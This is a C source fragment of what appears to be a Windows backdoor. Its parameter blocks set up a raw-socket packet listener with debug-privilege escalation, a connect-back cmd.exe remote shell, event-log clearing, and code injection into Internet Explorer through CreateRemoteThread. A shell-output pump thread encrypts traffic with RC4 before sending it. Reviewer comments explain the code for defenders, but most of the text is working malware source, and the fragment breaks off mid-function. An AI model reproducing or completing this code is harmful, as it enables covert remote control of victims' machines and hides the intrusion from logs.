tDeregisterEventSource pDeregisterEventSource;
tExitProcess pExitProcess;
char szExitProcess[12];
////
HMODULE hk32,hwinsock,hAdvapi;
// HMODULE husr32;
HANDLE hEvent;
char szApplications[13];
char szSecu[5];
char szSystem[7];
char szRegisterEventSource[21];
char szClearEventLog[15];
char szDeregisterEventSource[22];
// char szPostQuitMessage[20];
char szAdvapi32[13];
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szWSAStartup[11];
char szsocket[7];
char szgethostbyname[14];
char szconnect[8];
char szhtons[6];
char szinet_addr[10];
char host[100];
BOOL Encrypt;
int port;
//for cmd
char szcmdexe[8];
char szGetCurrentProcess[18];
char szDuplicateHandle[16];
char szCreatePipe[11];
char szclosesocket[12];
char szCreateProcess[15];
char szCloseHandle[12];
char szCreateThread[13];
char szWaitForMultipleObjects[23];
char szTerminateThread[16];
char szTerminateProcess[17];
char szDisconnectNamedPipe[20];
////
//data
WSADATA wsaData;
SOCKET client;
struct sockaddr_in local;
LPHOSTENT lpHostEntry;
//////////for cmd
SESSION_DATA Session;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD ThreadId;
HANDLE HandleArray[3];
int i;
HANDLE ShellStdinPipe;
HANDLE ShellStdoutPipe;
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO si;
ReadShellTParam *preadshellpar;
WriteShellTParam *writeshellpar;
//////////
}ConnectParam;
/* Thread-routine pointer type for the connect thread. It takes the ConnectParam
 * block whose tail is shown above (the head of that struct is outside this
 * view), so the thread can be started through CreateRemoteThread/CreateThread
 * with the parameter block as its single argument. */
typedef DWORD (WINAPI *tIConnectThread)(ConnectParam *sp);
/*
 * IEParam - parameter block handed to the thread that plants the session code
 * into a second process (tIStartInjectIEThread, declared right after this
 * struct). As with the other *Param blocks in this header, every Win32 API is
 * carried as a function pointer together with the name string used to resolve
 * it at run time, so the consuming routine needs no import table of its own.
 *
 * NOTE(review): field order is presumably layout-significant - the block looks
 * like it is copied between processes as raw bytes (cf. the p*/lclp* pairs
 * below) - so do not reorder or insert fields without checking the injector.
 */
typedef struct TIEParam
{
/* Resolution primitives plus the remote-thread injection set
 * (OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread).
 * For a defender, this API combination is the observable signature of the
 * block's purpose. */
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateRemoteThread pCreateRemoteThread;
tWriteProcessMemory pWriteProcessMemory;
tVirtualAllocEx pVirtualAllocEx;
// tMBox pMBox;
tCreateProcess pCreateProcess;
tOpenProcess pOpenProcess;
/* The three thread routines and their byte sizes. The size fields presumably
 * bound how much of each routine is copied into the target process - TODO
 * confirm against the code that fills them (see the End* marker functions). */
tIConnectThread pIConnectThread;
tISessionWriteShellThread pISessionWriteShellThread;
tISessionReadShellThread pISessionReadShellThread;
int iIConnectThreadsize;
int iISessionWriteShellThreadsize;
int iISessionReadShellThreadsize;
/* Two copies of each parameter pointer: p* and lclp*. The naming suggests
 * remote (target-process) address vs. local copy; verify against the caller
 * before relying on that reading. */
ReadShellTParam *pReadShellTParam;
WriteShellTParam *pWriteShellTParam;
ConnectParam *pConnectParam;
ReadShellTParam *lclpReadShellTParam;
WriteShellTParam *lclpWriteShellTParam;
ConnectParam *lclpConnectParam;
/* plcl* - presumably the local addresses of the same three routines. */
tIConnectThread plclIConnectThread;
tISessionWriteShellThread plclISessionWriteShellThread;
tISessionReadShellThread plclISessionReadShellThread;
/* Module handles resolved via pLoadLibrary. */
HMODULE hk32,hwinsock;
// HMODULE husr32;
/* ie: by name, the handle of the process being injected into - confirm. */
HANDLE ie;
DWORD rc;
/* Used with pCreateProcess; sziexplorerexe below is presumably its command
 * line (the name suggests Internet Explorer, but the string is set elsewhere). */
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO si;
/* Name strings for pLoadLibrary/pGetProcAddress. Each buffer appears to be
 * sized to the ASCII API name plus the terminating NUL (e.g. "CreateProcessA"
 * is 14 characters -> [15]); the strings themselves are filled in elsewhere. */
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szCreateProcess[15];
char sziexplorerexe[100];
char szVirtualAllocEx[15];
char szWriteProcessMemory[19];
char szCreateRemoteThread[19];
char szOpenProcess[12];
} IEParam;
/* Thread-routine pointer type for the injector thread; it receives the IEParam
 * block defined immediately above as its single argument. */
typedef DWORD (WINAPI *tIStartInjectIEThread)(IEParam *sp);
/*
 * SniffParam - parameter block for the listening side. It carries, in the same
 * "function pointer + name string" form as the other *Param blocks:
 *   - Winsock entry points (socket/bind/WSAIoctl/recv); the bind+WSAIoctl+recv
 *     trio is what a raw receive socket needs, which matches the "Sniff" name,
 *     but the ioctl code and socket type are set elsewhere - not visible here;
 *   - token-privilege APIs and their handles (see the "debug privilege" group);
 *   - CryptoAPI handles and the *decrypt* entry point, i.e. the counterpart of
 *     the encryption done in ISessionReadShellThread (same CSP/password fields,
 *     presumably the same MD5 -> RC4 derivation - confirm in the consumer);
 *   - pointers to the ConnectParam and IEParam blocks it hands on.
 *
 * NOTE(review): field order is presumably layout-significant (the block is
 * consumed by position-independent code) - do not reorder.
 */
typedef struct TSniffParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateThread pCreateThread;
// tMBox pMBox;
/* Winsock entry points used by the listener. */
tWSAStartup pWSAStartup;
tsocket psocket;
tbind pbind;
// tZeroMemory pZeroMemory;
tWSAIoctl pWSAIoctl;
trecv precv;
tSleep pSleep;
tlstrcpy plstrcpy;
HMODULE hk32,hwinsock,hAdvapi;
// HMODULE husr32;
DWORD rc;
/* Downstream parameter blocks and the routines that consume them. */
ConnectParam *pConnectParam;
tIConnectThread pIConnectThread;
IEParam *pIEParam;
tIStartInjectIEThread pIStartInjectIEThread;
/* Token privilege adjustment (OpenProcessToken / LookupPrivilegeValue /
 * AdjustTokenPrivileges). */
tOpenProcessToken pOpenProcessToken;
tLookupPrivilegeValue pLookupPrivilegeValue;
tAdjustTokenPrivileges pAdjustTokenPrivileges;
// tGetCurrentProcess pGetCurrentProcess;
/* Auth: flag only; what it gates is decided by the consumer, not visible here. */
BOOL Auth;
/* debug privilege: token handle, LUID and TOKEN_PRIVILEGES for the three
 * calls above. The name sedebugnameValue suggests SeDebugPrivilege - confirm
 * in the code that calls pLookupPrivilegeValue. */
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
/* CryptoAPI state. hXchgKey is declared but no exchange-key API pointer is
 * carried in this block; it may be unused here. */
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
/* Password and CSP name strings, mirrored from ReadShellTParam (cf.
 * RDp->szLocalPassword / RDp->CSP in ISessionReadShellThread). */
char szLocalPassword[100];
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptDecrypt pCryptDecrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tlstrcmp plstrcmp;
char szlstrcmp[9];
tCloseHandle pCloseHandle;
/* Commented-out file-logging fields (CreateFile/WriteFile/...) are kept as
 * found; nothing in this header references them. */
// HANDLE hf;
// tCreateFile pCreateFile;
// tWriteFile pWriteFile;
// tSetFilePointer pSetFilePointer;
tinet_ntoa pinet_ntoa;
char szinet_ntoa[100];
// char szSetFilePointer[100];
// char szCreateFile[100];
// char szWriteFile[100];
// char filename[100];
// char CR[100];
// DWORD dwBytes;
/* saSource: a source address; which packet field it is filled from is not
 * visible here. */
SOCKADDR_IN saSource;
/* API name strings for pGetProcAddress; buffers appear sized to the ASCII
 * name plus NUL (e.g. "CryptAcquireContextA" is 20 characters -> [21]). */
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptDecrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
char szGetCurrentProcess[18];
/* Library and remaining API name strings. */
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szSleep[6];
char szWSAStartup[11];
char szsocket[7];
char szbind[5];
char szrecv[5];
char szWSAIoctl[9];
char szlstrcpy[9];
char szAdjustTokenPrivileges[23];
char szOpenProcessToken[17];
char szLookupPrivilegeValue[22];
char szCloseHandle[12];
/* Socket state. Note sock is declared int rather than SOCKET, unlike
 * ConnectParam's client; RcvBuf is a fixed 100-byte receive buffer. */
WSADATA wsaData;
int sock;
SOCKADDR_IN sa;
DWORD dwBytesRet;
unsigned int optval ;
char RcvBuf[100];
} SniffParam;
// lclsniffpar.pZeroMemory = (tZeroMemory) GetProcAddress( hlib, "ZeroMemory" );
//if ( lclsniffpar.pZeroMemory == 0 ) { MessageBox(0,"err5","",MB_OK); goto cleanup; }
/*
 * ISessionReadShellThread - pump thread for the shell-output side of a session.
 *
 * Every API it calls is reached through a function pointer and a name string
 * carried in *RDp (pLoadLibrary/pGetProcAddress plus the sz* buffers), so the
 * routine has no import-table references of its own; presumably it is copied
 * into another process as a self-contained unit (cf. the *size fields in
 * IEParam) - TODO confirm against the injector.
 *
 * Behaviour as written:
 *   - loads ws2_32, kernel32 and advapi32 by the names stored in RDp;
 *   - polls RDp->Session->ReadPipeHandle with PeekNamedPipe, sleeping 800 ms
 *     per iteration;
 *   - when data is pending, reads it into RDp->Buff and, if RDp->Encrypt is
 *     set, encrypts it in place with an RC4 key derived (CryptDeriveKey) from
 *     an MD5 hash of RDp->szLocalPassword;
 *   - sends the buffer on RDp->Session->ClientSocket and stops on send failure.
 *
 * Returns 1 when a library or one of the five non-crypto APIs cannot be
 * resolved (nothing loaded so far is freed). Otherwise it ends via
 * pExitThread(0), so the trailing "return 0" is not reached.
 */
DWORD WINAPI ISessionReadShellThread(ReadShellTParam *RDp)
{
// RDp->husr32 = RDp->pLoadLibrary(RDp->szuser32dll);
/* Module handles are resolved by name string at run time. */
RDp->hwinsock = RDp->pLoadLibrary(RDp->szWs232 );
RDp->hk32 =RDp->pLoadLibrary( RDp->szkernel32dll);
RDp->hAdvapi =RDp->pLoadLibrary( RDp->szAdvapi32);
/* NOTE(review): hk32 is tested twice and hwinsock never; a failed ws2_32 load
 * would presumably only surface as psend==0 in the check further down. The
 * sibling ISessionWriteShellThread tests all three handles. */
if((RDp->hk32==0)||(RDp->hk32==0)||(RDp->hAdvapi==0)) return 1;
// RDp->pMBox= (tMBox)RDp->pGetProcAddress(RDp->husr32,RDp->szMessageBoxA );
/* API resolution by name: send from ws2_32, pipe/thread helpers from
 * kernel32, CryptoAPI from advapi32. */
RDp->psend=(tsend)RDp->pGetProcAddress(RDp->hwinsock, RDp->szsend);
RDp->pPeekNamedPipe=(tPeekNamedPipe)RDp->pGetProcAddress(RDp->hk32, RDp->szPeekNamedPipe);
RDp->pReadFile=(tReadFile)RDp->pGetProcAddress(RDp->hk32, RDp->szReadFile);
RDp->pSleep=(tSleep)RDp->pGetProcAddress(RDp->hk32, RDp->szSleep);
RDp->pExitThread=(tExitThread)RDp->pGetProcAddress(RDp->hk32, RDp->szExitThread);
RDp->pCryptAcquireContext=(tCryptAcquireContext)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptAcquireContext);
RDp->pCryptCreateHash=(tCryptCreateHash)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptCreateHash);
RDp->pCryptHashData=(tCryptHashData)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptHashData);
RDp->pCryptDeriveKey=(tCryptDeriveKey)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptDeriveKey);
RDp->pCryptEncrypt=(tCryptEncrypt)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptEncrypt);
RDp->pCryptDestroyKey=(tCryptDestroyKey)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptDestroyKey);
RDp->pCryptDestroyHash=(tCryptDestroyHash)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptDestroyHash);
RDp->pCryptReleaseContext=(tCryptReleaseContext)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptReleaseContext);
RDp->plstrlen=(tlstrlen)RDp->pGetProcAddress(RDp->hk32,RDp->szlstrlen);
/* Only the five non-crypto pointers are validated. The Crypt* pointers and
 * plstrlen are used unchecked inside the Encrypt branch below. */
if((RDp->pExitThread==0)||(RDp->pSleep==0)||(RDp->pReadFile==0)||(RDp->pPeekNamedPipe==0)||(RDp->psend==0))
return 1;
/////////////////////////////
/* Poll loop: runs until PeekNamedPipe fails (e.g. the pipe is closed). Each
 * iteration peeks up to sizeof(Buff) bytes and leaves the count in BytesRead. */
while (RDp->pPeekNamedPipe(RDp->Session->ReadPipeHandle, RDp->Buff, sizeof(RDp->Buff),&RDp->BytesRead, NULL, NULL))
{
RDp->pSleep(800);
//RDp->pSleep(1);
if (RDp->BytesRead > 0)
{
/* Return value ignored; BytesRead is overwritten with the count actually read. */
RDp->pReadFile(RDp->Session->ReadPipeHandle, RDp->Buff, sizeof(RDp->Buff),&RDp->BytesRead, NULL);
if(RDp->Encrypt){
/* Encrypt the chunk in place. Key schedule, repeated for every chunk:
 * MD5(szLocalPassword) -> CryptDeriveKey(CALG_RC4). Because the key is
 * re-derived from the same password each time and CryptEncrypt is called
 * with Final=TRUE on a fresh key object, every chunk is presumably XORed with
 * the same leading RC4 keystream (keystream reuse across chunks); worth
 * knowing when reconstructing captured traffic during an investigation. */
if (RDp->pCryptAcquireContext(&RDp->hProv, NULL, RDp->CSP, PROV_RSA_FULL, 0))
{
if (RDp->pCryptCreateHash(RDp->hProv, CALG_MD5, 0, 0, &RDp->hHash))
{
/* Password length via lstrlen; the password is hashed as raw bytes without NUL. */
RDp->dwLength =RDp->plstrlen(RDp->szLocalPassword);
// RDp->pMBox(0,RDp->szLocalPassword,RDp->szLocalPassword,MB_OK);
if (RDp->pCryptHashData(RDp->hHash, (BYTE *)RDp->szLocalPassword, RDp->dwLength, 0))
{
// RDp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
if (RDp->pCryptDeriveKey(RDp->hProv, CALG_RC4, RDp->hHash, CRYPT_EXPORTABLE, &RDp->hKey))
{
//RDp->dwLength =RDp->EchoCnt;
/* In-place encrypt; return value ignored. BytesRead serves as both the data
 * length and the buffer size, which is fine for a stream cipher (no expansion). */
RDp->pCryptEncrypt(RDp->hKey, 0, TRUE, 0, (BYTE *)RDp->Buff,&RDp->BytesRead,RDp->BytesRead);
RDp->pCryptDestroyKey(RDp->hKey);
//RDp->pMBox(0,RDp->RecvBuff,RDp->RecvBuff,MB_OK);
}
}
RDp->pCryptDestroyHash(RDp->hHash);
}
RDp->pCryptReleaseContext(RDp->hProv, 0);
}// end encrypt block
}
// RDp->pMBox(0,(char *)RDp->Buff,"",MB_OK);
/* A send result of 0 or SOCKET_ERROR ends the pump; the loop then falls
 * through to ExitThread below. */
if (RDp->psend(RDp->Session->ClientSocket, (char *)RDp->Buff, RDp->BytesRead, 0) <= 0){
// RDp->pMBox(0,RDp->szCryptDestroyHash,"",MB_OK);
break;
}
}
}
/* Terminates the thread here; the libraries loaded above are not freed. */
RDp->pExitThread(0);
return 0;
}
/*
 * EndISessionReadShellThread - empty marker function. Its body does nothing;
 * it presumably exists only so that its address can be subtracted from that of
 * ISessionReadShellThread to obtain the routine's byte size (cf.
 * iISessionReadShellThreadsize in IEParam) - TODO confirm in the caller.
 * NOTE(review): such a size is only meaningful if the compiler emits the two
 * functions adjacently and in source order, which no C standard guarantees.
 */
static void EndISessionReadShellThread(void)
{
}
DWORD WINAPI ISessionWriteShellThread(WriteShellTParam *WRp)
{
// WRp->husr32 = WRp->pLoadLibrary(WRp->szuser32dll);
WRp->hwinsock = WRp->pLoadLibrary(WRp->szWs232 );
WRp->hk32 =WRp->pLoadLibrary( WRp->szkernel32dll);
WRp->hAdvapi =WRp->pLoadLibrary( WRp->szAdvapi32);
if((WRp->hk32==0)||(WRp->hAdvapi==0)||(WRp->hwinsock==0)) return 1;